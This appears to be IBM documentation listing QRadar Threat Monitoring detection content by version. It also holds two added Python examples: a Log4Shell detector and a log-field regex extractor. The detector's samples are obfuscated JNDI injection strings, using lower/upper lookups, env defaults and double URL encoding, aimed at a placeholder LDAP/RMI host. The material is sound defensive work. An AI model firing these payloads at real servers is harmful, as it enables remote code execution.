Threat Monitoring
IBM Security QRadar Threat Monitoring Content Extension adds rule content and building blocks to QRadar that focus on threat events and detection. This extension enhances the base rule set of QRadar for administrators who have new QRadar installations.
This content extension requires the QRadar Threat Intelligence app (https://exchange.xforce.ibmcloud.com/hub/extension/IBMQRadar:ThreatIntelligence).
This content extension includes one or more Pulse dashboards. For more information about Pulse dashboards, see QRadar Pulse app.
IBM Security QRadar Threat Monitoring Content Extension
- IBM Security QRadar Threat Monitoring Content Extension 2.6.0
- IBM Security QRadar Threat Monitoring Content Extension 2.5.6
- IBM Security QRadar Threat Monitoring Content Extension 2.5.5
- IBM Security QRadar Threat Monitoring Content Extension 2.5.0
- IBM Security QRadar Threat Monitoring Content Extension 2.4.1
- IBM Security QRadar Threat Monitoring Content Extension 2.4.0
- IBM Security QRadar Threat Monitoring Content Extension 2.3.1
- IBM Security QRadar Threat Monitoring Content Extension 2.3.0
- IBM Security QRadar Threat Monitoring Content Extension 2.2.1
- IBM Security QRadar Threat Monitoring Content Extension 2.2.0
- IBM Security QRadar Threat Monitoring Content Extension 2.1.1
- IBM Security QRadar Threat Monitoring Content Extension 2.1.0
- IBM Security QRadar Threat Monitoring Content Extension 2.0.0
- IBM Security QRadar Threat Monitoring Content Extension 1.2.1
- IBM Security QRadar Threat Monitoring Content Extension 1.2.0
- IBM Security QRadar Threat Monitoring Content Extension 1.1.0
- IBM Security QRadar Threat Monitoring Content Extension 1.0.3
- IBM Security QRadar Threat Monitoring Content Extension 1.0.2
- IBM Security QRadar Threat Monitoring Content Extension 1.0.1
- IBM Security QRadar Threat Monitoring Content Extension 1.0.0
IBM Security QRadar Threat Monitoring Content Extension 2.6.0
The following table shows the rules that are updated in IBM Security QRadar Threat Monitoring Content Extension 2.6.0.
Type | Name | Description |
---|---|---|
Rule | New High Priority Target Detected | Triggers when a new high priority target is detected. |
Updated New High Risk Targets and High Risk Targets-Pie widgets in the attack surface management pulse dashboard.
IBM Security QRadar Threat Monitoring Content Extension 2.5.6
The following table shows the rules that are new in IBM Security QRadar Threat Monitoring Content Extension 2.5.6.
Type | Name | Description |
---|---|---|
Building Block | BB:DeviceDefinition: Web Servers | Defines web server devices on the system: events detected by the local system or by Apache HTTP Server, Microsoft IIS, NGINX HTTP Server, or Amazon AWS Route 53. |
Rule | Website Manipulations via SQL Injection | Triggers when abnormal behavior such as SQL injection is observed. Forces the detected event to create a new offense, indexed by source IP address. |
Rule | Microsoft Windows RCE Vulnerability - Suspicious Download Using Certutil | Detects activity associated with the Microsoft Exchange Server remote code execution vulnerabilities CVE-2022-41040 and CVE-2022-41082. Forces the detected event to create a new offense, indexed by source IP address. |
IBM Security QRadar Threat Monitoring Content Extension 2.5.5
The following table shows the rules that are new in IBM Security QRadar Threat Monitoring Content Extension 2.5.5.
Type | Name | Description |
---|---|---|
Rule | Microsoft Windows RCE Vulnerability - File Modification | Detects activity associated with the Microsoft Exchange Server remote code execution vulnerabilities CVE-2022-41040 and CVE-2022-41082. |
Rule | Microsoft Windows RCE Vulnerability - Suspicious Download Using Certutil | Detects activity associated with the Microsoft Exchange Server remote code execution vulnerabilities CVE-2022-41040 and CVE-2022-41082. |
Rule | Microsoft Windows RCE Vulnerability - Suspicious Files | Detects activity associated with the Microsoft Exchange Server remote code execution vulnerabilities CVE-2022-41040 and CVE-2022-41082. |
Rule | Microsoft Windows RCE Vulnerability - Suspicious Hashes | Detects known Windows RCE SHA256 hashes, as listed in the Windows RCE SHA256 Hashes reference set. |
Rule | Microsoft Windows RCE Vulnerability - Suspicious Ips | Detects known Windows RCE IP addresses, as listed in the Windows RCE IPs reference set. Note: Tune the rule based on your log sources to reduce the number of events that match this rule. |
The following table shows the custom properties that are new in IBM Security QRadar Threat Monitoring Content Extension 2.5.5.
Name | Optimized | Description |
---|---|---|
File Directory | Yes | Default custom extraction of File Directory from DSM payload. |
Filename | Yes | Default custom extraction of Filename from DSM payload. |
Process Commandline | Yes | Default custom extraction of Process Commandline from DSM payload. |
UrlHost | Yes | Default custom extraction of UrlHost from DSM payload. |
The following table shows the reference sets that are new in IBM Security QRadar Threat Monitoring Content Extension 2.5.5.
Name |
---|
Windows RCE IPs |
Windows RCE SHA256 Hashes |
IBM Security QRadar Threat Monitoring Content Extension 2.5.0
The following table shows the rules that are new in IBM Security QRadar Threat Monitoring Content Extension 2.5.0.
Type | Name | Description |
---|---|---|
Building Block | BB:DeviceDefinition: Attack Surface Management | Defines all attack surface management devices on the system. |
Rule | New Critical Temptation Target Detected | Triggers when a new critical temptation target is detected. |
Rule | New High Priority Target Detected | Triggers when a new high priority target is detected. |
Rule | New High Temptation Target Detected | Triggers when a new high temptation target is detected. |
Rule | Critical Temptation Target Changed to Lower Temptation | Triggers when a critical temptation target has decreased to medium or low temptation. |
Rule | High Priority Target Changed to Low Priority | Triggers when a high priority target decreased in priority value. |
Rule | High Temptation Target Changed to Lower Temptation | Triggers when a high temptation target has decreased to medium or low temptation. |
The following table shows the custom properties that are new in IBM Security QRadar Threat Monitoring Content Extension 2.5.0.
Name | Description |
---|---|
Priority | Default custom extraction of Priority from DSM payload. |
Target ID | Default custom extraction of Target ID from DSM payload. |
Temptation | Default custom extraction of Temptation from DSM payload. |
The following table shows the reference sets that are new in IBM Security QRadar Threat Monitoring Content Extension 2.5.0.
Name | Description |
---|---|
Critical Temptation Target | Maintains list of critical temptation targets. |
High Priority Target | Maintains list of high priority targets. |
High Temptation Target | Maintains list of high temptation targets. |
A new Pulse Dashboard is added, Attack Surface Management Devices Overview.
IBM Security QRadar Threat Monitoring Content Extension 2.4.1
- Multiple Threats Detected on Same Host (by Machine Identifier)
- Same Threat Detected on Same Host (by Machine Identifier)
- Same Threat Detected on Same Network Different Hosts (by Machine Identifier)
- Same Threat Detected on Multiple Hosts (by Machine Identifier)
- Same Threat Detected on Multiple Servers (by Machine Identifier)
- Multiple Unclean Threats Detected on Same Host (by Machine Identifier)
IBM Security QRadar Threat Monitoring Content Extension 2.4.0
The following table shows the rules that are updated in IBM Security QRadar Threat Monitoring Content Extension 2.4.0.
Type | Name | Update |
---|---|---|
Rule | Multiple Unclean Threats Detected on Same Host | Rule condition updated. |
Rule | Multiple Vector Attack Source | Rule updated to use BB:CategoryDefinition: Virus Detected instead of BB:CategoryDefinition: Malware Annoyances. |
Rule | Potential HTTP DoS Flooding | Rule condition updated. |
Rule | SMB Traffic Permitted From a Compromised Host | Fixed incorrect reference set link. |
Rule | Successful Login From a Compromised Host | Fixed incorrect reference set link. |
Rule | Suspicious Web Server Activities | Rule condition updated. |
- BB:CategoryDefinition: Malware Annoyances
- BB:Policy Violation: Application Policy Violation: NNTP to Internet
- BB:Policy Violation: IRC IM Policy Violation: IM Communications
- BB:Policy Violation: Mail Policy Violation: Outbound Mail Sender
IBM Security QRadar Threat Monitoring Content Extension 2.3.1
IBM Security QRadar Threat Monitoring Content Extension 2.3.1 includes a fix for an issue that caused installation to fail on QRadar 7.4.1 and earlier.
IBM Security QRadar Threat Monitoring Content Extension 2.3.0
The following table shows the building blocks that are new in IBM Security QRadar Threat Monitoring Content Extension 2.3.0.
Type | Name | Description |
---|---|---|
Building Block | BB:BehaviorDefinition: Communication with a Potential Hostile Host (Flows Reference Sets) | Defines communication with a potential hostile host, categorized by reference sets. The reference sets with the "XFE ATPF" prefix are managed automatically by the Threat Intelligence app and require a paid subscription. The other reference sets provided by the Threat Intelligence app can be used to include third-party threat intelligence feeds. |
Building Block | BB:BehaviorDefinition: Communication with a Potential Hostile Host (Flows X-Force Categorization) | Defines communication with a potential hostile host, categorized by X-Force. The confidence factor ranges from 0 to 100. |
Building Block | BB:BehaviorDefinition: Communication with a Potential Hostile IP Address (Flows Reference Sets) | Defines communication with a potential hostile IP address, categorized by reference sets. The reference sets with the "XFE ATPF" prefix are managed automatically by the Threat Intelligence app and require a paid subscription. The other reference sets provided by the Threat Intelligence app can be used to include third-party threat intelligence feeds. |
Building Block | BB:BehaviorDefinition: Communication with a Potential Hostile IP Address (Flows X-Force Categorization) | Defines communication with a potential hostile IP address, categorized by X-Force. |
The following list shows the rules and building blocks that are updated in IBM Security QRadar Threat Monitoring Content Extension 2.3.0.
- BB:Threats: Suspicious Network Traffic
- BB:Threats: Suspicious IP Network Traffic
- BB:Threats: X-Force Premium: Internal Connection to Host Categorized as Cryptocurrency Mining
- Communication with a Potential Hostile Host (Flows)
- Communication with a Potential Hostile IP Address (Flows)
- X-Force: Internal Connection to Host Categorized as Malware
- X-Force: Internal Host Communicating with Host Categorized as Anonymizer
- X-Force: Mail Server Sending Mail to Server Categorized as SPAM
- X-Force: Non-Mail Server Sending Mail to Servers Categorized as SPAM
- X-Force: Non-Servers Communicating with External IP Classified as Dynamic
- X-Force: Servers Communicating with External IP Classified as Dynamic
- X-Force: Successful Inbound connection from a Remote Proxy or Anonymization Service
- X-Force: Successful Outbound Connection to a Remote Proxy or Anonymization Service
The following table shows the details of the building block and rule updates in IBM Security QRadar Threat Monitoring Content Extension 2.3.0.
Type | Name | Update Details |
---|---|---|
Building Block | DeviceDefinition: DNS | Added additional log sources. |
Building Block | DeviceDefinition: Web Servers | Added additional log sources. |
Rule | Log4Shell Base Pattern in Flows | Removed BB:CategoryDefinition Successful Communication |
Rule | Log4Shell Evasion Pattern in Flows | Removed BB:CategoryDefinition Successful Communication |
IBM Security QRadar Threat Monitoring Content Extension 2.2.1
The following table shows the rules that are new or updated in IBM Security QRadar Threat Monitoring Content Extension 2.2.1.
Type | Name | Description |
---|---|---|
Rule | Multiple Threats Detected on Same Host | Triggers when multiple threats are detected on the same host. |
Rule | Same Threat Detected on Multiple Hosts | Triggers when the same threat is detected on multiple hosts that are not servers, which may indicate the presence of malware that is spreading in a network. |
Rule | Same Threat Detected on Multiple Servers | Triggers when the same threat is detected on multiple hosts that are servers, which may indicate the presence of malware that is spreading in a network. |
Rule | Same Threat Detected on Same Host | Triggers when the same threat is detected multiple times on the same host. This rule may indicate that the AV is cleaning a file that is generated by the threat and not the threat itself. The time window should be large enough to cover at least two cycles of checks made by the AV. |
Rule | Same Threat Detected on Same Network Different Hosts | Triggers when the same threat is detected on different hosts in the same segment of a network hierarchy, which may indicate the presence of malware that is spreading in the network. |
Rule | X-Force: Successful Outbound Connection to a Remote Proxy or Anonymization Service | Triggers when communication with a remote proxy or an anonymization service is observed. These services typically hide the originating source IP address. |
IBM Security QRadar Threat Monitoring Content Extension 2.2.0
The following table shows the custom properties that are new or updated in IBM Security QRadar Threat Monitoring Content Extension 2.2.0.
Name | Optimized | Found in |
---|---|---|
File Hash | Yes | |
HTTP Content-Type | Yes | Baseline Maintenance |
HTTP GET Request | Yes | Baseline Maintenance |
HTTP Host | Yes | Baseline Maintenance |
HTTP Referer | Yes | Baseline Maintenance |
HTTP Server | Yes | Baseline Maintenance |
HTTP User-Agent | Yes | Baseline Maintenance |
The following table shows the custom functions that are new in IBM Security QRadar Threat Monitoring Content Extension 2.2.0.
Name | Description |
---|---|
Log4j Detected | Detects log4j obfuscation techniques. |
The following table shows the rules that are new or updated in IBM Security QRadar Threat Monitoring Content Extension 2.2.0.
Type | Name | Description |
---|---|---|
Building Block | BB:CategoryDefinition: Database Access Denied | Identifies database events that are considered denied access. |
Building Block | BB:CategoryDefinition: Malware Annoyances | Defines spyware infection events. |
Building Block | BB:CategoryDefinition: Virus Detected | Defines virus detection events. |
Building Block | BB:FalseNegative: Events That Indicate Successful Compromise | Defines successful compromise events. |
Building Block | BB:NetworkDefinition: Undefined IP Space | Defines areas of your network that do not contain any valid hosts. |
Building Block | BB:NetworkDefinition: Watch List Addresses | Defines networks to be included into a watch list. |
Rule | Exploit Followed by Suspicious Host Activity | Triggers when exploit or attack events are followed by suspicious activity event, which may indicate a successful attack. |
Rule | Exploit: Exploits Followed by Firewall Accepts | Triggers when exploit or attack events are followed by firewall accept events, which may indicate a successful attack. |
Rule | Exploit/Malware Events Across Multiple Destinations | Triggers when exploit or malware events are seen on multiple destination hosts. This could indicate a malicious software or an attacker exploiting vulnerable hosts on the network. |
Rule | Log4Shell Base Pattern in Flows | Triggers when a potential remote code execution attempt related to the Log4Shell exploit (CVE-2021-44228) is observed in flows. This could also indicate an attacker attempting to bypass detection with techniques such as system environment variables, lower or upper lookups, invalid Unicode characters with upper, system properties, HTML URL encoding and notations. |
Rule | Log4Shell Evasion Pattern in Flows | Triggers when a potential remote code execution attempt related to the Log4Shell exploit (CVE-2021-44228) is observed in flows. This pattern targets an attacker attempting to bypass detection with techniques such as system environment variables, lower or upper lookups, invalid Unicode characters with upper, system properties, HTML URL encoding and notations. |
Rule | Log4Shell Hash in Events | Added File Hash to the rule condition |
Rule | Multiple Unclean Threats Detected on Same Host | Triggers when multiple threats are detected on the same host and the antivirus action taken is neither clean nor quarantine. Note: Tune this rule to reflect the antivirus actions that are acceptable in your environment. |
Rule | Multiple Vector Attack Source | Triggers when a source host tries multiple attack vectors. This could indicate the source host is specifically targeting an asset. |
Rule | Potential DoS Attack via Web Server Response Time | Updated rule to match the QID. |
Rule | Potential Log4Shell Activity | Triggers when a potential remote code execution attempt related to the Log4Shell exploit (CVE-2021-44228) is observed in events. This could also indicate an attacker attempting to bypass detection with techniques such as system environment variables, lower or upper lookups, invalid Unicode characters with upper, system properties, HTML URL encoding and notations. |
Rule | Potential Log4Shell Activity (Flows) | Triggers when a potential remote code execution attempt related to the Log4Shell exploit (CVE-2021-44228) is observed in flows. This could also indicate an attacker attempting to bypass detection with techniques such as system environment variables, lower or upper lookups, invalid Unicode characters with upper, system properties, HTML URL encoding and notations. |
Rule | Source Vulnerable to any Exploit | Triggers when a local host is attacked where the source has at least one vulnerability. This could indicate the host was targeted in a previous exploit. |
Rule | Source Vulnerable to this Exploit | Triggers when a local host is attacked where the source host is vulnerable to the attack being used. This could indicate the host was targeted in a previous exploit or vulnerability. |
Rule | Successful Signature Compromise | Triggers when a host signature is successfully compromised. |
Rule | Website Manipulation via SQL Injection | Updated the AQL filter. |
- BB:CategoryDefinition: Any Flow
- BB:CategoryDefinition: Authentication Success
- BB:CategoryDefinition: Exploits Backdoors and Trojans
- BB:CategoryDefinition: Firewall or ACL Accept
- BB:CategoryDefinition: Firewall or ACL Denies
- BB:CategoryDefinition: IRC Detected Based on Application
- BB:CategoryDefinition: IRC Detected Based on Event Category
- BB:CategoryDefinition: IRC Detection Based on Firewall Events
- BB:CategoryDefinition: Mail Policy Violation
- BB:CategoryDefinition: Post Exploit Account Activity
- BB:CategoryDefinition: Recon Event Categories
- BB:CategoryDefinition: Recon Events
- BB:CategoryDefinition: Recon Flows
- BB:CategoryDefinition: Successful Communication
- BB:CategoryDefinition: Suspicious Event Categories
- BB:CategoryDefinition: Suspicious Events
- BB:CategoryDefinition: Suspicious Flows
- BB:CategoryDefinition: Unidirectional Flow
- BB:CategoryDefinition: Unidirectional Flow DST
- BB:CategoryDefinition: Unidirectional Flow SRC
- BB:DeviceDefinition: AV/AM
- BB:DeviceDefinition: FW / Router / Switch
- BB:DeviceDefinition: IDS / IPS
- BB:DeviceDefinition: Proxy
- BB:Flowshape: Inbound Only
- BB:Flowshape: Outbound Only
- BB:HostDefinition: Database Servers
- BB:HostDefinition: DHCP Servers
- BB:HostDefinition: DNS Servers
- BB:HostDefinition: FTP Servers
- BB:HostDefinition: LDAP Servers
- BB:HostDefinition: Mail Servers
- BB:HostDefinition: Network Management Servers
- BB:HostDefinition: Proxy Servers
- BB:HostDefinition: RPC Servers
- BB:HostDefinition: Servers
- BB:HostDefinition: SNMP Sender or Receiver
- BB:HostDefinition: SSH Servers
- BB:HostDefinition: Virus Definition and Other Update Servers
- BB:HostDefinition: Web Servers
- BB:HostDefinition: Windows Servers
- BB:HostReference: Database Servers
- BB:HostReference: DHCP Servers
- BB:HostReference: DNS Servers
- BB:HostReference: FTP Servers
- BB:HostReference: LDAP Servers
- BB:HostReference: Mail Servers
- BB:HostReference: Proxy Servers
- BB:HostReference: SSH Servers
- BB:HostReference: Web Servers
- BB:HostReference: Windows Servers
- BB:NetworkDefinition: Honeypot like Addresses
- BB:PortDefinition: Common Worm Ports
- BB:PortDefinition: Database Ports
- BB:PortDefinition: DHCP Ports
- BB:PortDefinition: DNS Ports
- BB:PortDefinition: FTP Ports
- BB:PortDefinition: IRC Ports
- BB:PortDefinition: LDAP Ports
- BB:PortDefinition: Mail Ports
- BB:PortDefinition: Proxy Ports
- BB:PortDefinition: RPC Ports
- BB:PortDefinition: SNMP Ports
- BB:PortDefinition: SSH Ports
- BB:PortDefinition: Web Ports
- BB:PortDefinition: Windows Ports
- BB:ProtocolDefinition: Windows Protocols
- Local: FTP Detected on Non-Standard Port
- Local: SSH or Telnet Detected on Non-Standard Port
- Possible Local IRC Server
- Potential Honeypot Access
- Remote: FTP Detected on Non-Standard Port
- Remote: Local P2P Client Connected to more than 100 Servers
- Remote: Local P2P Client Detected
- Remote: Local P2P Server Detected
- Remote: SMTP Mail Sender
- Remote: SSH or Telnet Detected on Non-Standard Port
- Remote: Suspicious Amount of IM/Chat Traffic
- Remote: Usenet Usage
The following table shows the saved searches that are new or updated in IBM Security QRadar Threat Monitoring Content Extension 2.2.0.
Name | Description |
---|---|
Potential Log4Shell Detected | Searches to detect Log4j activity in events. |
Potential Log4Shell Detected (Flows) | Searches to detect Log4j activity in flows. |
IBM Security QRadar Threat Monitoring Content Extension 2.1.1
Updated the error handling in the HOMOGLYPH::DETECTED custom function that is used in several rules and saved searches.
The following table shows the reference data that is new or updated in IBM Security QRadar Threat Monitoring Content Extension 2.1.1.
Name | Description |
---|---|
Malicious URLs | Lists identified malicious URLs. |
Malware URLs | Lists identified malware URLs. |
Phishing URLs | Lists identified phishing URLs. |
IBM Security QRadar Threat Monitoring Content Extension 2.1.0
The following table shows the custom properties that are new or updated in IBM Security QRadar Threat Monitoring Content Extension 2.1.0.
Name | Optimized | Found in |
---|---|---|
API Path | No | Amazon AWS |
MD5 Hash | No | Cisco AMP |
Parent MD5 Hash | No | Cisco AMP |
Parent SHA1 Hash | No | Cisco AMP |
Parent SHA256 Hash | No | Cisco AMP |
Referrer URL | Yes | |
Request URI | No | Amazon AWS |
SHA1 Hash | No | Cisco AMP |
SHA256 Hash | No | Cisco AMP |
URL | Yes | |
URL Path | No | Cisco AMP |
UrlHost | Yes | |
User Agent | No | |
The following table shows the rules that are new or updated in IBM Security QRadar Threat Monitoring Content Extension 2.1.0.
Type | Name | Description |
---|---|---|
Rule | Log4Shell Base Pattern | Triggers when a potential remote code execution attempt related to the Log4Shell exploit (CVE-2021-44228) is observed. This could also indicate an attacker attempting to bypass detection with techniques such as system environment variables, lower or upper lookups, invalid Unicode characters with upper, system properties, HTML URL encoding and notations. |
Rule | Log4Shell Evasion Pattern | Triggers when a potential remote code execution attempt related to the Log4Shell exploit (CVE-2021-44228) is observed. This pattern targets an attacker attempting to bypass detection with techniques such as system environment variables, lower or upper lookups, invalid Unicode characters with upper, system properties, HTML URL encoding and notations. |
Rule | Log4Shell Hash in Events | Triggers when an IOC (file hash) related to the Log4Shell exploit (CVE-2021-44228) is observed in an event. Note: The Log4Shell MD5, Log4Shell SHA1, and Log4Shell SHA256 reference sets are prepopulated. Tune these reference sets with relevant IOCs. |
Rule | Log4Shell Hash in Flows | Triggers when an IOC (file hash) related to the Log4Shell exploit (CVE-2021-44228) is observed in a flow. Note: The Log4Shell MD5, Log4Shell SHA1, and Log4Shell SHA256 reference sets are prepopulated. Tune these reference sets with relevant IOCs. |
The following table shows the reference data that is new or updated in IBM Security QRadar Threat Monitoring Content Extension 2.1.0.
Name | Description |
---|---|
Log4Shell MD5 | This reference set lists MD5 hashes associated with Log4Shell (CVE-2021-44228). |
Log4Shell SHA1 | This reference set lists SHA1 hashes associated with Log4Shell (CVE-2021-44228). |
Log4Shell SHA256 | This reference set lists SHA256 hashes associated with Log4Shell (CVE-2021-44228). |
The following table shows the saved searches that are new or updated in IBM Security QRadar Threat Monitoring Content Extension 2.1.0.
Name | Description |
---|---|
Historical Instances of Log4Shell - Events | Searches to detect Log4j activity in events. |
Historical Instances of Log4Shell - Flows | Searches to detect Log4j activity in flows. |
Log4Shell Base Pattern | Searches to detect Log4j activity. |
Log4Shell Evasion Pattern | Searches to detect Log4j activity. |
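The evasion techniques named for the Log4Shell rules in 2.1.0 and 2.2.0 (and handled by the Log4j Detected custom function in 2.2.0) are easier to reason about with the normalization written out. The following Python script is an added example, not the content extension's own detection logic or AQL: it percent-decodes the input, collapses nested ${...} lookups from the inside out (lower/upper lookups, env/sys lookups with ":-" defaults, an upper lookup on a Unicode character whose uppercase form is ASCII) and only then looks for a JNDI lookup and its scheme. The sample request fragments are constructed for the example and 198.51.100.7 is a documentation address.

```python
import re
from urllib.parse import unquote

# Constructed sample payloads for this example (not from the content
# extension). The first five use the obfuscation techniques the evasion
# rules name: plain lookup, lower/upper lookups, env/sys lookups with a
# ":-" default, doubled URL encoding, and an upper lookup on a Unicode
# character whose uppercase form is ASCII. The last two are benign.
SAMPLES = {
    "plain": "GET /?x=${jndi:ldap://198.51.100.7:1389/a} HTTP/1.1",
    "lower_upper": "User-Agent: ${${lower:j}${upper:n}${lower:d}i:ldap://198.51.100.7/a}",
    "env_default": "${${env:NOTHING:-j}ndi:${sys:NOTHING:-l}dap://198.51.100.7/a}",
    "url_encoded": "GET /?q=%2524%257Bjndi%253Aldap%253A%252F%252F198.51.100.7%252Fa%257D",
    "unicode_upper": "${jnd${upper:\u0131}:rmi://198.51.100.7/a}",
    "benign_1": "GET /index.html HTTP/1.1",
    "benign_2": "Invoice total ${amount}, see {jndi} chapter",
}

# An innermost ${...} lookup: no nested '$', '{' or '}' inside the braces.
INNER = re.compile(r"\$\{([^${}]*)\}")
# A JNDI lookup and its scheme, matched only after normalization.
JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)\s*:", re.IGNORECASE)


def resolve_lookup(match):
    """Evaluate one innermost Log4j-style lookup the way the obfuscation
    relies on: lower/upper transform their argument, a lookup with a ':-'
    default (env, sys, date, empty prefix, ...) yields the default, and a
    quoted date pattern yields its literal text. A jndi lookup, or an
    unknown one, is returned untouched."""
    body = match.group(1)
    prefix, _, arg = body.partition(":")
    prefix = prefix.strip().lower()
    if prefix == "jndi":
        return match.group(0)
    if ":-" in body:
        return body.split(":-", 1)[1]
    if prefix == "lower":
        return arg.lower()
    if prefix == "upper":
        return arg.upper()
    if prefix == "date":
        return arg.strip("'\"")
    return match.group(0)


def normalize(text, max_rounds=10):
    """Undo (possibly repeated) percent-encoding, then collapse nested
    lookups from the inside out until the string stops changing."""
    for _ in range(max_rounds):
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    for _ in range(max_rounds):
        resolved = INNER.sub(resolve_lookup, text)
        if resolved == text:
            break
        text = resolved
    return text


def detect_log4shell(text):
    """Return the JNDI scheme (ldap, rmi, dns, ...) that survives
    normalization, or None when the text carries no JNDI lookup."""
    match = JNDI.search(normalize(text))
    return match.group(1).lower() if match else None


def scan_samples():
    """Run the detector over every sample payload."""
    return {name: detect_log4shell(payload) for name, payload in SAMPLES.items()}


if __name__ == "__main__":
    for name, verdict in scan_samples().items():
        print(f"{name:14s} -> {verdict}")
```

Run it directly to print a verdict per sample. The point of the nested resolution is that a search for `${jndi:` over the raw payload misses every obfuscated form above, while the same search after normalization catches all five and still ignores the benign `${amount}`.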
IBM Security QRadar Threat Monitoring Content Extension 2.0.0
The following table shows the custom properties that are new or updated in IBM Security QRadar Threat Monitoring Content Extension 2.0.0.
Name | Optimized | Found in |
---|---|---|
BytesReceived | Yes | |
BytesSent | Yes | |
Method | No | |
Referrer URL | Yes | |
Response Code | No | |
Server Response Time | Yes | Apache |
URL Query String | No | |
The following table shows the rules and building blocks that are new or updated in IBM Security QRadar Threat Monitoring Content Extension 2.0.0.
Type | Name | Description |
---|---|---|
Building Block | BB:DeviceDefinition: Web Servers | Defines web server devices on the system. |
Building Block | BB:Threats: HTTP Client Status | Detects malformed web server client requests. |
Building Block | BB:Threats: HTTP Server Status | Detects malformed web server requests. |
Building Block | BB:Threats: HTTP Service Unavailable | Detects when the web server service is unavailable. |
Building Block | BB:Threats: Potential DoS Attack | Detects potential Denial-of-Service attacks on a web server. |
Building Block | BB:Threats: Suspicious IP Network Traffic | Detects suspicious network traffic on a web server from an IP address categorized by X-Force as malicious. |
Building Block | BB:Threats: Suspicious Network Traffic | Detects suspicious network traffic on a web server from an IP address categorized by X-Force as malicious. |
Building Block | BB:Threats: Unsafe HTTP Methods | Detects when unsafe HTTP methods are used against the web server. |
Rule | Communication with a web site known to be delivering code which may be a trojan | Updated the rule response. |
Rule | Potential Continued Risky Web Server Activity | Triggers when unsafe HTTP methods are seen continuously. This could be a malicious attacker updating web application contents. |
Rule | Potential DoS Attack on a Web Server | Triggers when a potential Denial-of-Service attack is detected from a single source IP address. |
Rule | Potential DoS Attack via Web Server Response Time | Triggers when the server response time increases sharply as a result of too much traffic from one IP address. This could indicate abusive users, misbehaving bots, or a potential denial-of-service attack. |
Rule | Potential HTTP DoS Flooding | Triggers when a web server is flooded with HTTP requests. This could indicate an attacker sending a series of HTTP requests to a web server, flooding it with more requests than it can process. |
Rule | Potential Malicious Activity Identified by Referrer URL | Triggers when a referrer url attributed to potentially malicious activity is observed. |
Rule | Potential Website Content Update | Triggers when a change or update is made to a web application. This could be a malicious attacker updating the content of a web page causing defacement. |
Rule | Same Threat Detected on Same Host | Updated to include IP addresses. |
Rule | Suspicious DNS Query Length | Updated the rule condition. |
Rule | Suspicious Network Traffic to Internal Web Server | Triggers when an IP address that matches known hostile IP addresses categorized by X-Force scans the same URL multiple times. |
Rule | Suspicious Web Server Activities | Triggers when either a web server client error or server error is detected. This could indicate suspicious activity. |
Rule | Website Manipulations via SQL Injection | Triggers when abnormal behaviour such as SQL Injection is observed. |
The following table shows the reference data that is new or updated in IBM Security QRadar Threat Monitoring Content Extension 2.0.0.
Type | Name | Description |
---|---|---|
Reference Set | Malware URLs | This reference set lists identified malware URLs. |
Reference Set | XFE ATPF-mw_url | This reference set lists identified malware URLs. |
The following table shows the saved searches that are new or updated in IBM Security QRadar Threat Monitoring Content Extension 2.0.0.
Name | Description |
---|---|
Response Time By Server | This search shows the average request time by server. |
IBM Security QRadar Threat Monitoring Content Extension 1.2.1
The following table shows the custom properties in IBM Security QRadar Threat Monitoring Content Extension 1.2.1.
Name | Optimized | Capture Group | Regex |
---|---|---|---|
Threat Name | Yes | 1 | One of the following patterns (capture group 1 in each): |
- emailThreats=([^\s]+)
- EVC_EV_VIRUS_NAME=([^\s]+)
- malware_signature=([^\t]+)
- Spyware\/Grayware: ([^\s]+)
- threatName=([^\s]+)
- virus_name: "(.*?)"
- Virus\/Malware: ([^\s]+)
- VirusName=([^\t]+)
IBM Security QRadar Threat Monitoring Content Extension 1.2.0
The following table shows the custom properties in IBM Security QRadar Threat Monitoring Content Extension 1.2.0.
Name | Optimized | Capture Group | Regex |
---|---|---|---|
DNS Request Type | No | 1, 1, 2 | The three patterns listed after this table, with the capture group for each |
Subtype | No | 1 | Send/Receive indicator=([^\s]+) |
Patterns for DNS Request Type (capture group in parentheses):
- cat=([^_]+) (1)
- Question Type=([^\s]+) (1)
- query:\s([^\s]+)\s\w+\s(\w+) (2)
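As an added example (not code from the content extension), the following Python script applies the Threat Name, DNS Request Type and Subtype expressions from the 1.2.x tables above to constructed sample payloads and returns the named capture group. The script tries the expressions in the order listed and takes the first match; that ordering is this example's own choice, not a statement of how QRadar selects among a property's expressions. The sample log lines are invented for the example and do not reproduce any vendor's exact format.

```python
import re

# Custom property definitions copied from the tables above: each property is
# an ordered list of (regex, capture group). In this example the first
# expression that matches the payload supplies the value.
CUSTOM_PROPERTIES = {
    "Threat Name": [
        (r"emailThreats=([^\s]+)", 1),
        (r"EVC_EV_VIRUS_NAME=([^\s]+)", 1),
        (r"malware_signature=([^\t]+)", 1),
        (r"Spyware\/Grayware: ([^\s]+)", 1),
        (r"threatName=([^\s]+)", 1),
        (r'virus_name: "(.*?)"', 1),
        (r"Virus\/Malware: ([^\s]+)", 1),
        (r"VirusName=([^\t]+)", 1),
    ],
    "DNS Request Type": [
        (r"cat=([^_]+)", 1),
        (r"Question Type=([^\s]+)", 1),
        (r"query:\s([^\s]+)\s\w+\s(\w+)", 2),
    ],
    "Subtype": [
        (r"Send/Receive indicator=([^\s]+)", 1),
    ],
}

COMPILED = {
    name: [(re.compile(pattern), group) for pattern, group in patterns]
    for name, patterns in CUSTOM_PROPERTIES.items()
}

# Constructed sample payloads (not real vendor logs): an AV event in three
# different DSM styles, a BIND-style query log line and a Windows DNS
# debug-log style line.
SAMPLES = {
    "av_trend": "Virus/Malware: TROJ_GEN.R002C0DKQ23 Computer: WS-042 File: C:\\Users\\a\\inv.exe Action: Quarantined",
    "av_quoted": 'Scan type: Realtime virus_name: "EICAR Test String" action: quarantined',
    "av_cef": "CEF:0|Vendor|Product|1.0|100|Malware|8|threatName=Trojan.Agent src=10.0.0.5",
    "dns_bind": "client 10.0.0.5#53412: query: evil.example.com IN TXT + (10.0.0.1)",
    "dns_windows": "Send/Receive indicator=Snd Remote IP=10.0.0.5 Question Type=AAAA Question Name=(3)www(7)example(3)com(0)",
}


def extract(property_name, payload):
    """Return the capture of the first expression that matches the
    payload, or None if no expression for the property matches."""
    for regex, group in COMPILED[property_name]:
        match = regex.search(payload)
        if match:
            return match.group(group)
    return None


def extract_all(payload):
    """Evaluate every custom property against one payload."""
    return {name: extract(name, payload) for name in COMPILED}


if __name__ == "__main__":
    for name, payload in SAMPLES.items():
        print(name, extract_all(payload))
```

Running the script shows which expression each sample satisfies; a payload that matches none of a property's expressions yields None for that property, which is what you would see as an empty custom property in QRadar.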
